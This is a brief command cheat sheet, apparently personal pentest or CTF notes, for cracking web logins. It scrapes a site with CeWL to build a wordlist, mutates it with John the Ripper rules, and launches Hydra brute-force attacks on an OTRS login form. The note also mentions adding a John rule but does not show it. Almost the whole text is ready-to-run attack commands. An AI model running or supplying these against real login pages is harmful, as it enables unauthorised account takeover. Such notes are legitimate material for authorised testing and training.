# Create a Wordlist of a website and Put the whole path of the website
cewl -w wordlist.txt -d 5 http://<IP>/html5
# Change -l user and pass, post request and Failed request, -s is for port
hydra -l root@localhost -P wordlist.txt <IP> http-post-form "</otrs/index.pl>:Action=Login&RequestedURL=&Lang=en&TimeOffset=300&User=^USER^&Password=^PASS^:Login Failed" -V
hydra -L ../usernames.txt -P /root/scripts/wordlist/CeWL/pw.txt http-post-form "</otrs/index.pl>:Action=Login&RequestedURL=&Lang=en&TimeOffset=-120&User=^USER^&Password=^PASS^:F=Login failed" -I
# Creating a Wordlist with Cewl
cewl www.testwebsite.com -m 6 -w pass.txt # -m is min 6 length word
# Creating wordlist + Adding a rule in Johntheripper
sudo nano /etc/john/john.conf
-> Add this rule in last, Add two numbers to the end of each password
# Took the wordlist, added rules, and outputted in mutated.txt
john --wordlist=pass.txt --rules --stdout > mutated.txt